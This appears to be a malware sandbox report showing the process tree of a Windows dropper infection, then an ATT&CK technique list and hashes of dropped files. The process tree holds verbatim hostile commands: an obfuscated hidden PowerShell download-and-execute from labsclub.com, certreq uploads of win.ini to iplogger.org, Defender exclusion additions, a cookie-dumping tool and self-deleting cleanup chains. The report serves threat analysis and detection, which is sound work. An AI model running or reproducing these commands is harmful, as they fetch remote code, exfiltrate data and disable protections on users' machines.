C:\Program Files\Google\OYCDWENCLX\prolab.exe
"C:\Program Files\Google\OYCDWENCLX\prolab.exe" /VERYSILENT
19⤵
PID:7620

C:\Users\Admin\AppData\Local\Temp\is-I9LSS.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I9LSS.tmp\prolab.tmp" /SL5="$30512,575243,216576,C:\Program Files\Google\OYCDWENCLX\prolab.exe" /VERYSILENT
20⤵
PID:7660

C:\Users\Admin\AppData\Local\Temp\71-0e39a-bda-f7a9e-3e10b1b441b93\Jeshucynuhy.exe
"C:\Users\Admin\AppData\Local\Temp\71-0e39a-bda-f7a9e-3e10b1b441b93\Jeshucynuhy.exe"
19⤵
PID:7632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4cx4dh1c.vua\GcleanerWW.exe /mixone & exit
20⤵
PID:7000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe & exit
20⤵
PID:7708

C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe
21⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\kito5gxt.3im\privacytools5.exe
22⤵
PID:7772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtzfasht.0py\setup.exe /8-2222 & exit
20⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\xtzfasht.0py\setup.exe
C:\Users\Admin\AppData\Local\Temp\xtzfasht.0py\setup.exe /8-2222
21⤵
PID:556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Sound"
22⤵
PID:228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\51wrr40v.odb\MultitimerFour.exe & exit
20⤵
PID:7444

C:\Users\Admin\AppData\Local\Temp\51wrr40v.odb\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\51wrr40v.odb\MultitimerFour.exe
21⤵
PID:1064

C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
22⤵
PID:564

C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe" 1 3.1615015136.60432ce02ea19 104
23⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\0VGEKNUEFV\multitimer.exe" 2 3.1615015136.60432ce02ea19
24⤵
PID:4076

C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\Delta.exe" /Verysilent
14⤵
PID:7756

C:\Users\Admin\AppData\Local\Temp\is-9B4QV.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9B4QV.tmp\Delta.tmp" /SL5="$503E6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\Delta.exe" /Verysilent
15⤵
PID:7784

C:\Users\Admin\AppData\Local\Temp\is-3QIPP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3QIPP.tmp\Setup.exe" /VERYSILENT
16⤵
PID:6172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-3QIPP.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
17⤵
PID:3608

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
18⤵
- Kills process with taskkill
PID:4744

C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\zznote.exe" /Verysilent
14⤵
PID:2588

C:\Users\Admin\AppData\Local\Temp\is-4BQJA.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4BQJA.tmp\zznote.tmp" /SL5="$304A4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\zznote.exe" /Verysilent
15⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\is-DLFE4.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-DLFE4.tmp\jg4_4jaa.exe" /silent
16⤵
PID:7776

C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-CQ2P7.tmp\hjjgaa.exe" /Verysilent
14⤵
PID:552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
15⤵
PID:3236

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
15⤵
PID:2968

C:\Users\Admin\AppData\Local\Temp\re4u2taf1wk\vict.exe
"C:\Users\Admin\AppData\Local\Temp\re4u2taf1wk\vict.exe" /VERYSILENT /id=535
10⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\is-3K6R4.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3K6R4.tmp\vict.tmp" /SL5="$103F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\re4u2taf1wk\vict.exe" /VERYSILENT /id=535
11⤵
PID:3400

C:\Users\Admin\AppData\Local\Temp\is-E3NIM.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-E3NIM.tmp\wimapi.exe" 535
12⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\yY5Xt8diG.exe
"C:\Users\Admin\AppData\Local\Temp\yY5Xt8diG.exe"
13⤵
PID:6216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im yY5Xt8diG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\yY5Xt8diG.exe" & del C:\ProgramData\*.dll & exit
14⤵
PID:5464

C:\Windows\SysWOW64\taskkill.exe
taskkill /im yY5Xt8diG.exe /f
15⤵
- Kills process with taskkill
PID:7040

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
15⤵
- Delays execution with timeout.exe
PID:6564

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
13⤵
PID:4072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
14⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\khzttn4jw50\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\khzttn4jw50\chashepro3.exe" /VERYSILENT
10⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\is-Q1BOH.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q1BOH.tmp\chashepro3.tmp" /SL5="$103F8,2015144,58368,C:\Users\Admin\AppData\Local\Temp\khzttn4jw50\chashepro3.exe" /VERYSILENT
11⤵
PID:5328

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
12⤵
PID:5932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
13⤵
PID:6600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
13⤵
PID:6688

C:\Windows\SysWOW64\cmd.exe
cmd
14⤵
PID:1160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
12⤵
PID:2280

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
12⤵
PID:3492

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
12⤵
PID:2544

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
13⤵
PID:6880

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
12⤵
PID:5244

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
13⤵
PID:7044

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
12⤵
PID:188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
12⤵
PID:5476

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
12⤵
PID:2864

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
12⤵
PID:5224

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
13⤵
PID:6852

C:\Users\Admin\AppData\Local\Temp\pbsv5dwhf0m\oedlylfeu4t.exe
"C:\Users\Admin\AppData\Local\Temp\pbsv5dwhf0m\oedlylfeu4t.exe" /ustwo INSTALL
10⤵
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 656
11⤵
- Program crash
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 672
11⤵
- Program crash
PID:6332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 628
11⤵
- Program crash
PID:6712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 720
11⤵
- Program crash
PID:6840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 884
11⤵
- Program crash
PID:6512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 932
11⤵
- Program crash
PID:6364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 1088
11⤵
- Program crash
PID:6096

C:\Users\Admin\AppData\Local\Temp\phly3v05rre\l3w5amgzgkt.exe
"C:\Users\Admin\AppData\Local\Temp\phly3v05rre\l3w5amgzgkt.exe" 57a764d042bf8
10⤵
PID:4288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\H4LFHWEFEH\H4LFHWEFE.exe" 57a764d042bf8 & exit
11⤵
PID:6376

C:\Program Files\H4LFHWEFEH\H4LFHWEFE.exe
"C:\Program Files\H4LFHWEFEH\H4LFHWEFE.exe" 57a764d042bf8
12⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\010ltjk1x4b\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\010ltjk1x4b\vpn.exe" /silent /subid=482
10⤵
PID:4984

C:\Users\Admin\AppData\Local\Temp\is-49EUJ.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-49EUJ.tmp\vpn.tmp" /SL5="$104C0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\010ltjk1x4b\vpn.exe" /silent /subid=482
11⤵
PID:5220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
12⤵
PID:7024

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
13⤵
PID:4452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
12⤵
PID:4552

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
13⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\25jofn25l5h\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\25jofn25l5h\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
10⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\is-CS4CP.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CS4CP.tmp\IBInstaller_97039.tmp" /SL5="$203C8,14452723,721408,C:\Users\Admin\AppData\Local\Temp\25jofn25l5h\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
11⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
12⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\is-7C0J7.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-7C0J7.tmp\{app}\chrome_proxy.exe"
12⤵
PID:6692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7C0J7.tmp\{app}\chrome_proxy.exe"
13⤵
PID:5664

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
14⤵
- Runs ping.exe
PID:4488

C:\Users\Admin\AppData\Local\Temp\wxmat3ybjbk\app.exe
"C:\Users\Admin\AppData\Local\Temp\wxmat3ybjbk\app.exe" /8-23
10⤵
PID:5512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Wind"
11⤵
PID:6224

C:\Program Files (x86)\Lingering-Wind\7za.exe
"C:\Program Files (x86)\Lingering-Wind\7za.exe" e -p154.61.71.51 winamp-plugins.7z
11⤵
PID:372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lingering-Wind\app.exe" -map "C:\Program Files (x86)\Lingering-Wind\WinmonProcessMonitor.sys""
11⤵
PID:6640

C:\Program Files (x86)\Lingering-Wind\app.exe
"C:\Program Files (x86)\Lingering-Wind\app.exe" -map "C:\Program Files (x86)\Lingering-Wind\WinmonProcessMonitor.sys"
12⤵
PID:6132

C:\Program Files (x86)\Lingering-Wind\7za.exe
"C:\Program Files (x86)\Lingering-Wind\7za.exe" e -p154.61.71.51 winamp.7z
11⤵
PID:6256

C:\Program Files (x86)\Lingering-Wind\app.exe
"C:\Program Files (x86)\Lingering-Wind\app.exe" /8-23
11⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\2FDB.exe
C:\Users\Admin\AppData\Local\Temp\2FDB.exe
1⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\34FC.exe
C:\Users\Admin\AppData\Local\Temp\34FC.exe
1⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:4588

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:5008

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:5440

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6848

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:7156

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4444

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1132

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:7376

C:\Users\Admin\AppData\Local\Temp\E03C.exe
C:\Users\Admin\AppData\Local\Temp\E03C.exe
1⤵
PID:7700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3271.bat" "
2⤵
PID:9184

C:\Users\Admin\AppData\Local\Temp\2E7C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2E7C.tmp.exe
1⤵
PID:6592

C:\Users\Admin\AppData\Local\Temp\3A55.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3A55.tmp.exe
1⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\3D72.exe
C:\Users\Admin\AppData\Local\Temp\3D72.exe
1⤵
PID:8072

C:\Users\Admin\AppData\Local\Temp\4D62.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4D62.tmp.exe
1⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\55FE.tmp.exe
C:\Users\Admin\AppData\Local\Temp\55FE.tmp.exe
1⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\8200.tmp.exe
C:\Users\Admin\AppData\Local\Temp\8200.tmp.exe
1⤵
PID:7548

C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe
C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe
1⤵
PID:4808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:5348

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 1892
2⤵
- Program crash
PID:304

C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\AC4D.tmp.exe"
2⤵
PID:8340

C:\Users\Admin\AppData\Local\Temp\D61E.tmp.exe
C:\Users\Admin\AppData\Local\Temp\D61E.tmp.exe
1⤵
PID:1084

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6032

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8000

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6324

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6760

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4644

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6864

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1944

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7012

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:620

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7188

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6428

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:8476

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{10308d81-b0d8-4b48-b0b2-617a4af7e36b}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:8708

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
2⤵
PID:7516

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\391feca84d754ed79cc087bb679a313b /t 564 /p 7188
1⤵
PID:8656

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:2100

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5136

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\DTS\seed.sfx.exe
MD5
3f3b5b47470a262ea22584c6d816889e

SHA1
1f1dd3ae1186315cda4d816644b7194ef2d4b1d8

SHA256
d890d264da5585bf37ea35e9df85dc60c718a1b509ce7988d5c4803738f80eb0

SHA512
38c8c73a70bfe2aa18c1eab54ead8a76192cb57aa35ae3c2d5e9be359ebf82b0a780a2ea2d2812d52882b8bc5fc9bfda0fb7096acbdb15ec9ee418ba3fef4b63

Download Submit
C:\Program Files (x86)\DTS\seed.sfx.exe
MD5
3f3b5b47470a262ea22584c6d816889e

SHA1
1f1dd3ae1186315cda4d816644b7194ef2d4b1d8

SHA256
d890d264da5585bf37ea35e9df85dc60c718a1b509ce7988d5c4803738f80eb0

SHA512
38c8c73a70bfe2aa18c1eab54ead8a76192cb57aa35ae3c2d5e9be359ebf82b0a780a2ea2d2812d52882b8bc5fc9bfda0fb7096acbdb15ec9ee418ba3fef4b63

Download Submit
C:\Program Files (x86)\Seed Trade\Seed\seed.exe
MD5
1e318119fdcd8c3541ec26be8c78684b

SHA1
a918d02af23a41f245b53a69b8be0faae6b9580b

SHA256
521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1

SHA512
fc8a0ff6b11a39d5521a47becb8a2f23810c267bb31cc6daffe6250292de8351eacf7640e4fd79c7055756ef7a72befc63314eee14bf4503068aff260e1c829c

Download Submit
C:\Program Files (x86)\Seed Trade\Seed\seed.exe
MD5
1e318119fdcd8c3541ec26be8c78684b

SHA1
a918d02af23a41f245b53a69b8be0faae6b9580b

SHA256
521e6ab3da29cda2fc6399ac88289ed9762577ff4e9742a56ec89bf4521be6c1

SHA512
fc8a0ff6b11a39d5521a47becb8a2f23810c267bb31cc6daffe6250292de8351eacf7640e4fd79c7055756ef7a72befc63314eee14bf4503068aff260e1c829c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10A6.exe
MD5
a7c67420d5a5b8cb958aa167c966a413

SHA1
041e46a2ddc719a933094e3b26ea34090da8662e

SHA256
c3a59dbdd70febc50251b17d1ba06e2c51f7e708b68f4db893010084ac5e2a9e

SHA512
b0cf5720377268757eef860feead37e1563222b26a74709c3f7aaeff12606708a405d9973924f48cfe05466c25af2b735b59ac850c764e9d0ccbfaa207c50076

Download Submit
C:\Users\Admin\AppData\Local\Temp\10A6.exe
MD5
a7c67420d5a5b8cb958aa167c966a413

SHA1
041e46a2ddc719a933094e3b26ea34090da8662e

SHA256
c3a59dbdd70febc50251b17d1ba06e2c51f7e708b68f4db893010084ac5e2a9e

SHA512
b0cf5720377268757eef860feead37e1563222b26a74709c3f7aaeff12606708a405d9973924f48cfe05466c25af2b735b59ac850c764e9d0ccbfaa207c50076

Download Submit
C:\Users\Admin\AppData\Local\Temp\10A6.exe
MD5
a7c67420d5a5b8cb958aa167c966a413

SHA1
041e46a2ddc719a933094e3b26ea34090da8662e

SHA256
c3a59dbdd70febc50251b17d1ba06e2c51f7e708b68f4db893010084ac5e2a9e

SHA512
b0cf5720377268757eef860feead37e1563222b26a74709c3f7aaeff12606708a405d9973924f48cfe05466c25af2b735b59ac850c764e9d0ccbfaa207c50076

Download Submit
C:\Users\Admin\AppData\Local\Temp\1CCD.exe
MD5
445d01e252420981e0d11ef2f5761770

SHA1
954ce5f8e3333ee9d5c143d7b33977d44134b3d3

SHA256
a864e2df14f4d7391068b8c04903273f68e1c1383c01af7aad1d38abe70ddc67

SHA512
c81e751d5574c5d4ede2a6c374c49be62544ec1b5599e0975d0074b911c59f66e02f10bea63f9344ed9b199072f2cc3ebad66f8efae87c545d51491fddc03222

Download Submit
C:\Users\Admin\AppData\Local\Temp\1CCD.exe
MD5
445d01e252420981e0d11ef2f5761770

SHA1
954ce5f8e3333ee9d5c143d7b33977d44134b3d3

SHA256
a864e2df14f4d7391068b8c04903273f68e1c1383c01af7aad1d38abe70ddc67

SHA512
c81e751d5574c5d4ede2a6c374c49be62544ec1b5599e0975d0074b911c59f66e02f10bea63f9344ed9b199072f2cc3ebad66f8efae87c545d51491fddc03222

Download Submit
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
MD5
0ba504abc80b8b3557dae74c89697ce4

SHA1
d7dc010cc0331772e61a967c0ab675691004838f

SHA256
ae8aa98e7cf4dfe0e55142d42444d617792577ba3e5d1660c0bcb1c13e4a3c4b

SHA512
34c5edb8c00f2a22d2033e0a9db8a8f804fdaad9f4ef317a54b4d8fa6922617f9bdf9b4faedb8fc54b7f6fbcffa8bbd625d2ddfe0d47c6eb14c7c368329a6594

Download Submit
C:\Users\Admin\AppData\Local\Temp\2615.exe
MD5
795283cfd157a83ca08f471d9b637eae

SHA1
5c6df5e17f36fb07eac2cc80d6531bcc3bf45ff7

SHA256
569827111daa3e75082ce87b1058c3f28731ecb24f3dee8f73c4c5a0f4d59b55

SHA512
02ebf57869bb491df96fc58b4a9e46b0180533b7c188161ebd7200e5debb7eadd1f7a18de57d88aa1c99b9f2efd11187dc281f7e5143510e6b9d8bbfc79d3aab

Download Submit
C:\Users\Admin\AppData\Local\Temp\2615.exe
MD5
795283cfd157a83ca08f471d9b637eae

SHA1
5c6df5e17f36fb07eac2cc80d6531bcc3bf45ff7

SHA256
569827111daa3e75082ce87b1058c3f28731ecb24f3dee8f73c4c5a0f4d59b55

SHA512
02ebf57869bb491df96fc58b4a9e46b0180533b7c188161ebd7200e5debb7eadd1f7a18de57d88aa1c99b9f2efd11187dc281f7e5143510e6b9d8bbfc79d3aab

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5

SHA1
185fd4793db912410de63ac7a5a3b1ac9c266b38

SHA256
cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19

SHA512
eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418

Download Submit
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
MD5
afd51e2ff7beac4d0c88d8f872d6d0d5

SHA1
185fd4793db912410de63ac7a5a3b1ac9c266b38

SHA256
cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19

SHA512
eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418

Download Submit
